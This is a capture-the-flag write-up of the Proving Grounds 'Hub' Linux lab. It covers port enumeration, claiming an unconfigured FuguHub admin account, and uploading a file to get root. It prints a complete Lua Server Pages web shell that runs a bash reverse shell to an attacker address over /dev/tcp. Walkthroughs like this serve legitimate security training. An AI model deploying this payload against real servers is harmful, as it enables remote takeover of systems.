Hub

Source: Proving Grounds OS: Linux Community Rating: Easy

Enumeration & Reconnaissance

  • I started with autorecon as usual and it exposed several ports:

    • SSH (22)

    • HTTP (80)

    • HTTP (8082)

    • HTTP (9999)

Service Analysis

  • I began with HTTP (80), but access was forbidden. Running a fuzzer revealed a license file at: http://192.168.197.25/LICENSE.txt

HTTP (80)

  • This file exposed information about the software in use, including the line:

See the following page for license information: 
http://barracudadrive.com/purchase.lsp
License

Gaining Initial Access

  • I recalled a vulnerability with this software on Windows and did a quick check for a Linux variant, but found nothing at the time.

  • On HTTP (8082), I discovered a FuguHub site that wasn’t even configured. It allowed me to configure the admin account and set a password.

HTTP (8082)
Admin Configuration

  • Once set, I noticed that the site included a Web File Server, which enabled file uploads. I looked for a CVE to automate the process and found CVE-2023-24078. Although I tried the PoCs, they didn't work as expected.

Web File Server

  • I then took a manual approach: I created a Lua shell (using the .lsp extension, as it's the extension exposed in the license file on HTTP (80) and the extension used in the PoCs) with the following content:

<div style="margin-left:auto;margin-right: auto;width: 350px;">
  <div id="info">
    <h2>Lua Server Pages Reverse Shell</h2>
    <p>Delightful, isn't it?</p>
  </div>
  <?lsp if request:method() == "GET" then ?>
     <?lsp os.execute("bash -c 'bash -i >& /dev/tcp/192.168.45.201/8082 0>&1'") ?>
  <?lsp else ?>
     You sent a <?lsp=request:method()?> request
  <?lsp end ?>
</div>

  • I uploaded the Lua shell using the Web File Server and then accessed it at: http://192.168.197.25:8082/revshell.lsp

  • That was it. I got access as root.

Access as Root

Lessons Learned

  • Even when standard HTTP access is forbidden, auxiliary files (like license files) can reveal details about the underlying software and potential vulnerabilities.

  • Unconfigured admin interfaces, such as the one on FuguHub, can provide a convenient entry point.

  • When automated PoCs fail, manually crafting a payload (in this case, a Lua shell) can get the job done.

  • Leveraging the file upload functionality can be a direct path to remote code execution.

PreviousCraneNextBlackGate

Last updated